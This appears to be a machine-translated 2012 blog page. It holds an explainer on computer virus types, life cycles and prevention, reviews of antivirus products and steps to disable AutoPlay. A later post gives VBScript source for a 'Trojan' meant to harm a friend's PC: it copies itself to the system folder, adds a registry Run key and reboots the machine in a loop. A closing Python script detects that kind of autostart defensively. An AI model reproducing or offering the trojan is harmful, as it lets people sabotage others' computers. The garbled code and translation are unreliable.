
Wednesday, April 11, 2012

What is a Virus

OVERVIEW OF VIRUS
1949: John von Neumann put forward the "self-altering automata theory", the result of mathematical research.
1960: experts at Bell Labs (AT&T) experimented with the theory expressed by John von Neumann, playing around with it in the form of a game. The experts wrote programs that could reproduce themselves and destroy an opponent's program. The program that was able to survive and destroy all other programs was deemed the winner. This game eventually became a favorite in every computer lab. Over time they realized and became wary of this game because the programs created were more and more dangerous, so they put it under strict surveillance and security.
1980: the program that eventually became known as the "virus" successfully spread beyond the lab environment and began circulating in cyberspace. From 1980, viruses spreading in the cyber world began to be known.

B. DEFINITION OF A VIRUS
"A program that can infect other programs by modifying them to include a copy of itself. A slightly altered virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every program that gets infected can also act as a viral infection that grows." (Fred Cohen)
The term "virus" was first used by Fred Cohen in 1984 in the United States. A computer virus is called a "virus" because it has some fundamental similarities with viruses in the medical sense (biological viruses).
A computer virus can be understood as an ordinary computer program. But it has a fundamental difference from other programs: a virus is created to infect other programs, alter them, manipulate them and even destroy them. Note that a virus will infect only when its trigger program, or a program that has already been infected, is executed; this is where it differs from a "worm". This paper will not discuss worms because that would divert us from the discussion of viruses.
C. VIRUS CRITERIA
A program can truly be called a virus only if it has at least five criteria:
1. The ability to obtain information
2. The ability to examine a program
3. The ability to multiply and spread
4. The ability to manipulate
5. The ability to hide itself
Each ability, and why it is necessary, is explained briefly below.
1. The ability to obtain information
In general, a virus requires a list of the names of files in a directory. What for? So that it can identify which programs it will infect. For example, a macro virus will infect all files ending in *.doc once it finds them. This is where the ability to gather information is needed, so that the virus can build a list of all files and then sort through them, looking for files it can infect. Usually this data is created when an infected program, or the virus program itself, is executed. The virus immediately collects the data and puts it in RAM (usually :P), so that when the computer shuts down all the data is lost, but it is created again each time a virus-carrying program is run, and it is usually made a hidden file by the virus.
2. The ability to examine a program
A virus must also be able to examine a program that is to be infected. For example, if its task is to infect files with the *.doc extension, it must check whether the document file has already been infected, because if it has, infecting it a second time is useless. This is very useful for improving the speed with which a virus infects files/programs. The common practice is for the virus to mark a file/program that has been infected so that it is easy for the virus to recognize. An example of such marking is placing a unique byte in every file that has been infected.
3. The ability to multiply
This ability is what really makes a virus; without it, it is not a virus. The core of a virus is the ability to duplicate itself by infecting other programs. Once a virus has found its victim (either a file or a program), it identifies it by checking it; if it is not already infected, the virus begins the infection by writing an identifier byte into the program/file, and then copies/writes the object code of the virus onto the infected file/program. Some common ways a virus infects/reproduces itself are:
a. The file/program to be infected is deleted or renamed, then a file containing the virus is created using that name (i.e. the virus changes its name to the name of the deleted file).
b. A virus program that is already executing/loaded into memory directly infects other files by piggybacking on the entire file/program.
4. The ability to manipulate
The routine owned by a virus is started after the virus infects a file/program. The contents of this routine can range from the mildest to destruction. The routine makes use of the capabilities of the operating system, so it has the same capabilities as the operating system. For example:
a. Displaying an image or message on the monitor
b. Changing the label of each file, directory, or the label of a drive on the PC
c. Manipulating the infected program/file
d. Damaging a program/file
e. Disrupting the printer's operation, etc.
5. The ability to hide itself
The ability to hide itself must be possessed by a virus so that all of its work, from the beginning to successful transmission, can be carried out. The usual steps are:
- The original virus program is stored in machine-code form and combined with other programs that the user considers useful.
- The virus program is placed in the boot record or on a track that is rarely noticed by the computer itself.
- The virus program is made as short as possible, and the infected file does not change its size.
- The virus does not change the time stamp of a file.
- Etc.

D. VIRUS LIFE CYCLE
The virus life cycle in general goes through four stages:
o Dormant phase (rest/sleep phase). In this phase the virus is not active. The virus is activated by a particular condition, such as a specified date, the presence of another program, the execution of another program, etc. Not all viruses go through this phase.
o Propagation phase (distribution phase). In this phase the virus copies itself to a program or to a place on storage media (hard drives, RAM, etc.). Each infected program becomes a "clone" of the virus (depending on how the virus infects).
o Triggering phase (active phase). In this phase the virus becomes active, and this is also triggered by several conditions, as in the dormant phase.
o Execution phase. In this phase the virus that has been activated performs its function, such as deleting files, displaying messages, etc.

E. TYPES OF VIRUS
To further refine our knowledge about viruses, I'll try to give an explanation of the types of viruses that often roam the cyber world.
1. Macro Virus
This is a type of virus we have surely heard of very often. It is written in the programming language of an application rather than the programming language of an operating system. The virus can run if its host application can run properly; that is, if a Mac computer can run the Word application, then this virus works on a Mac operating system. Virus samples:
- W97M variants, e.g. W97M.Panther: length 1234 bytes; infects normal.dot and infects documents when they are opened.
- WM.Twno.A;TW: 41 984 bytes long; infects MS Word documents that use the macro language, usually with the extensions *.DOT and *.DOC.
- Etc.
2. Boot Sector Virus
Boot sector viruses are very commonly spread. When reproducing itself, this virus will remove or replace the original boot sector with the virus boot program. So when booting occurs, the virus is loaded into memory and then has the ability to control standard hardware (e.g. monitor, printer, etc.), and from memory it also spreads to all drives connected to the computer (e.g. floppy, drives other than drive C). Virus samples:
- wyx virus variants, e.g. wyx.C(B): infects the boot record and floppy; length: 520 bytes; characteristics: memory resident and encrypted.
- V-sign variants: infect the Master Boot Record; length 520 bytes; characteristics: memory resident, encrypted, and polymorphic.
- Stoned.june 4th/bloody!: infects the Master Boot Record and floppy; length 520 bytes; characteristics: memory resident, encrypted, and displays the message "Bloody! june 4th 1989" after the computer boots 128 times.
3. Stealth Virus
This virus takes control of the DOS interrupt table, which we often refer to as an "interrupt interceptor". The virus is able to control DOS-level instructions, and such viruses are usually hidden, as the name suggests, either fully or in size. Virus samples:
- Yankee.XPEH.4928: infects *.COM and *.EXE files; length 4298 bytes; characteristics: memory resident, hidden size, has a trigger.
- WXYC (which belongs to the boot record category; because it also falls in the stealth category it is included here as well): infects floppy and mother boot record; length 520 bytes; memory resident; hidden size and virus.
- Vmem(s): infects *.EXE, *.SYS and *.COM files; file length 3275 bytes; characteristics: memory resident, hidden size, encrypted.
- Etc.
4. Polymorphic Virus
This virus is designed to mislead antivirus programs, meaning the virus always tries to avoid being recognized by antivirus by constantly changing itself.
Virus samples:
- Necropolis A/B: infects *.EXE and *.COM files; file length 1963 bytes; characteristics: memory resident, hidden size and virus, encrypted, and can change its structure.
- Nightfall: infects *.EXE files; file length 4554 bytes; characteristics: memory resident, hidden size and virus, has a trigger, encrypted, and can change its structure.
- Etc.
5. File/Program Virus
This virus infects files that can be executed directly by the operating system, whether application files (*.EXE) or *.COM. Infection by this virus can usually be detected by a change in the size of the attacked file.
6. Multi-Partition Virus
This virus is a combination of the boot sector virus and the file virus, meaning its work has two effects: it can infect *.EXE files and also infect the boot sector.

F. SOME WAYS VIRUSES SPREAD
Like biological viruses, computer viruses must have a medium through which to spread. Computer viruses can spread to various parts of your computer or to other machines in a number of ways, including:
1. Diskettes and R/W storage media. External storage media can be an easy target for viruses to use as a medium, both as a place to reside and as a distribution medium. Media that can perform R/W (read and write) operations can carry a virus and serve as a distribution medium.
2. Networks (LAN, WAN, etc.). A direct connection between multiple computers makes it possible for a virus to move along when files/programs containing the virus are exchanged or executed.
3. WWW (internet). It is quite possible for a site to have a 'virus' planted in it that will infect computers that access it.
4. Freeware, shareware or even pirated software. Many viruses are deliberately planted in a program that is distributed free of charge, or in a trial version that has a virus embedded in it.
5. Email attachments and file transfers. Almost all types of viruses these days use email attachments, because all internet users use email to communicate. These files are intentionally made striking to attract attention, and often have a double extension in the file name.

G. COUNTERMEASURES
1. Steps for Prevention
For prevention you can take the following steps:
o Use an antivirus you trust with the latest updates; the brand does not matter as long as it is always updated, and turn on Auto-protect.
o Always scan all external storage media that will be used. This may be a bit inconvenient, but if your antivirus's Auto-protect is working, this procedure can be skipped.
o If you are connected directly to the Internet, try to combine your antivirus with a firewall, anti-spam, etc.
2. Steps Once Infected
o Detect and determine roughly where the source of the virus is: diskette, network, email, etc. If you are connected to a network, it is a good idea to isolate your computer first (either by unplugging the cable or disabling the connection from the control panel).
o Identify and classify what type of virus is attacking your PC, by:
- The symptoms, such as messages, files that are corrupted or lost, etc.
- Scanning with your antivirus. If you are hit while Auto-protect is running, the virus definitions on the computer do not have data on this virus; try to update manually, or download virus definitions to install. If the virus blocks your attempt to update, try using another medium (computer) with an antivirus that has the latest updates.
o Clean: after you have successfully detected and identified it, immediately try to find ways of removing or destroying it on sites that provide information on the development of the virus. This applies if your antivirus with the latest updates does not succeed in destroying it.

10 Best Antivirus and 10 Deadly Viruses

BitDefender Antivirus Pro 2011

BitDefender Antivirus Pro 2011 has comprehensive features and is very easy to use. A new feature of this antivirus is Search Advisor, which integrates into the browser and provides protection when browsing on the internet. There is also the Active Virus Control feature, designed to detect and remove hidden security threats. The shortcoming of BitDefender Antivirus Pro is that it uses slightly more resources on the computer, though the user will not feel it.

    
Kaspersky Anti-virus 2011
Kaspersky Labs is again one of the popular security vendors to issue an antivirus product. Kaspersky Antivirus 2011 promises comfort and a more modern level of security without sacrificing the performance of your computer, with new features, namely Desktop Security Gadget and System Watcher Technology, and some improvements in its products. It is the most effective antivirus in combating malware and is easy to use, but unfortunately quite expensive.



    
Webroot Antivirus 2011
Webroot Antivirus 2011 combines antivirus protection from Sophos with Spy Sweeper, which is one of the best antispyware programs. Webroot Antivirus is easy to operate and has effective protection features and performance. The Spy Sweeper feature addresses threats and interference from adware, pop-ups and rootkits while browsing on the internet, and informs the user so that the threat can be dealt with appropriately. The disadvantage of this antivirus is that battery saving and rescue CD features are not available.


    
Norton AntiVirus 2011
Norton Antivirus 2011 improves on the features of previous versions and adds some additional features. Symantec/Norton is one of the major players in the antivirus market. In previous years Norton users were less satisfied with Norton's antivirus capabilities because of the amount of resources used and performance that was not fast enough, but it seems all the shortcomings of previous versions have been addressed in the 2011 version.

    
ESET NOD32 Antivirus 2011
Provides strong security protection without interfering with the performance of the computer, with advanced heuristic detection features and a diagnostic tool. Heuristic technology helps overcome virus problems, and ThreatSense technology helps protect against a variety of malware. What this antivirus lacks are anti-phishing and IM Protection features. It is ideal for home users who need security software that is simple, easy to install and works automatically.

    
AVG Anti-virus 2011
AVG Anti-Virus 2011 is one of the most widely used security programs, with a simple display suitable for users who want security without being bothered with a variety of configuration. With innovative new features and performance improvements, AVG performs better than ever. Link Scanner, a new feature in the 2011 version, provides security protection from malware that is currently widely spread through social networking sites. The PC Analyzer feature scans the computer to find registry errors, junk files, disk errors and broken shortcuts that can then be repaired.

    
G DATA AntiVirus 2011
G DATA AntiVirus 2011 provides security protection from malware by using two different scanning engines, namely heuristic and self-learning fingerprinting. G DATA is a quite affordable antivirus program with a high level of security protection and a user-friendly interface that makes the program easy to operate. However, this antivirus program lacks gamer mode, battery saving mode and link scanner features.




    
Avira AntiVir 2011
Avira AntiVir Premium offers balanced performance and security protection. Known as cost-effective antivirus software, Avira is the right solution to protect PC users from the threat of viruses or malware at this time. Its scanner is capable of scanning all files that are accessed in less than one second before the file is opened by the user. Avira AntiVir is able to create a bootable rescue disk, which is especially useful when your PC crashes and will not restart normally. But Avira's shortcoming is that its heuristic analysis and detection technologies are sometimes overprotective, blocking or deleting files that are not malware as a threat (false positives).

    
VIPRE Antivirus 4
VIPRE has the most efficient scanning engine with advanced heuristic technology; Genscan and Cobra are dynamically able to find malware before it infects a computer. A Home Site License is suitable for home users who have more than one PC. The secure file eraser feature allows users to erase sensitive files permanently without fear of malware or virus threats. But installing VIPRE Antivirus is not as easy as with other antivirus programs.

    
Trend Micro Titanium Antivirus +
With cloud features that provide protection and real-time security updates, Trend Micro Titanium Antivirus detects malware threats before they infect the computer system. In addition, because some of the antivirus's files or portions are hosted online, the user does not have to worry about the amount of disk space used. Trend Micro focuses more on speed and performance, so there are no additional features or tools in the current version. Although this does not reduce the ability or the essential features of an antivirus, it is a serious deficiency given that competitors' antivirus software has improved or added sophisticated new features to their products.

       
Besides protecting our PC or notebook by installing even the greatest antivirus, we still have to take preventive measures ourselves. For example, preventing viruses from flash disks. Flash disks or USB pen drives are now a very popular portable storage medium, but also the number one medium for the spread of viruses or trojans. To prevent our USB drive from becoming a medium for spreading viruses or trojans to the computer, there are several ways, such as creating an Autorun.inf file and a file that will prevent a virus from infecting, copying or deleting files on the USB drive.
A simpler way is to download a free application from Panda Software, Panda USB Vaccine; with this software we can protect a flash disk from being infected with a virus or trojan. Similar software is USB Defender. I find this application more suitable, because besides being portable it is also very easy to use. When a USB drive is plugged into the PC, USB Defender automatically detects it and, as Panda USB Vaccine does, the application will also remove any virus or trojan it finds. The various viruses that are rampant these days mostly spread through flash disks; when we plug a flash disk into the computer, by default Windows XP automatically opens a new task with the Auto Run / Auto Play function.
Disable the Auto Run / Auto Play function:
- Run "gpedit.msc"
- Click Administrative Templates under Computer Configuration
- Click System
- Click Turn Off Auto Play
- Select Enabled
- In the drop-down, select All drives
- OK
- Still in Group Policy
- Click Administrative Templates under User Configuration
- Click System
- Click Turn Off Auto Play
- Select Enabled
- In the drop-down, select All drives
- OK
- Shut down, restart
Another way: removing malware, viruses, trojans and spyware with HijackThis

HijackThis is an application that can be used to find and remove spyware, viruses, trojans and other malware on the computer. The log HijackThis produces after it is run helps us learn the type of malware, its location, and the files that may have been infected. But for ordinary users, HijackThis is rather more confusing to use than other similar software.

Never remove any application unless we know or understand that the application has been infected with or carries a malware file that can interfere with computer performance. The latest version of HijackThis has a feature called AnalyzeThis: HijackThis logs are uploaded to the TrendSecure website and compared with other logs, or the user can upload the HijackThis log to Hijackthis.de for analysis that can provide information about any malware on the user's computer.

Another effective way, among others, is to enable the Guest user and always log in as the Guest user. With the Guest user, we indirectly turn off the registry. A virus will always infect the registry and change values in it. If you want to install new software, simply use "Run As" Administrator from the Guest user. And lastly, of course, always update the antivirus on a regular basis.


Here are 10 vicious computer viruses we need to know and be aware of:

1. Storm Worm
2. Leap-A/Oompa-A
3. Sasser and Netsky
4. MyDoom (Novarg)
5. SQL Slammer / Sapphire
6. Nimda
7. Code Red & Code Red II
8. The Klez
9. ILOVEYOU
10. Melissa

Thursday, April 5, 2012

How to Make Trojan Virus Using Notepad

For science ... for you who want ignorant friend ... n all want data damaged. There cra ni Virus with notepad easy to make.

* note the following copy all the source into notepad save as. vbs (if you want to activate)
if not let it remain in the file exstensi.txt
exampels: ippamd0_trojanHorse.VBS


Copy all the source below:
brakes - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData

set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)

createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB", sysDir & "\ dlRB.vbs"

sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub

set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close

set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")

set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem ()

setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" & vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function

rebootSystem function ()
strComputer = "."

Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function

yes ... do not forget saved?
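
A defensive check for two points on this page, as an added example that is not part of the original posts: it reads the text of a `reg export` and flags Run/RunOnce values that launch a script file (the persistence the script above sets up with its `dlRB` Run value), and reports whether the "Turn Off Auto Play" policy described earlier is set for all drives. It assumes that policy corresponds to `NoDriveTypeAutoRun` = 0xFF under `Policies\Explorer`; the sample export is constructed, and real exports are UTF-16 and must be decoded before parsing.

```python
import re

# Constructed sample in the text form that `reg export` writes (not real data).
# "dlRB" mirrors the Run value and file name used by the script on this page;
# "VendorTray" and "Updater" are hypothetical entries.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorTray"="\"C:\\Program Files\\Vendor\\tray.exe\" /min"
"dlRB"="C:\\WINDOWS\\system32\\dlRB.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Updater"="wscript.exe //B \"C:\\Users\\test\\AppData\\Roaming\\u.js\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
RUN_KEY_RE = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.I)
POLICY_KEY_RE = re.compile(r'\\CurrentVersion\\Policies\\Explorer$', re.I)
# Script types run by Windows Script Host or cmd.exe; \b keeps ".json" out.
SCRIPT_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|wsh|bat|cmd)\b', re.I)


def parse_reg(text):
    """Return {key_path: {value_name: data}}; strings unescaped, dwords as int."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = VAL_RE.match(line)
        if not m or current is None:
            continue
        name, raw = m.group(1), m.group(2)
        if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            # .reg strings escape backslash and double quote with a backslash.
            current[name] = re.sub(r'\\(.)', r'\1', raw[1:-1])
        elif raw.lower().startswith('dword:'):
            current[name] = int(raw[6:], 16)
    return keys


def script_autostarts(keys):
    """List (key, value_name, command) for autostart values that run a script."""
    hits = []
    for path, values in keys.items():
        if not RUN_KEY_RE.search(path):
            continue
        for name, data in values.items():
            if isinstance(data, str) and SCRIPT_RE.search(data):
                hits.append((path, name, data))
    return hits


def autorun_disabled(keys):
    """Map hive -> True when NoDriveTypeAutoRun is 0xFF (all drive types)."""
    result = {}
    for path, values in keys.items():
        if POLICY_KEY_RE.search(path):
            result[path.split('\\', 1)[0]] = values.get('NoDriveTypeAutoRun') == 0xFF
    return result


if __name__ == '__main__':
    parsed = parse_reg(SAMPLE_REG)
    for key, name, command in script_autostarts(parsed):
        print('script autostart:', key, name, command)
    for hive, ok in autorun_disabled(parsed).items():
        print('AutoRun disabled for all drives in', hive, '->', ok)
```

A hive that never appears in the `autorun_disabled` result has no `Policies\Explorer` key in the export at all, which means the policy has not been configured there.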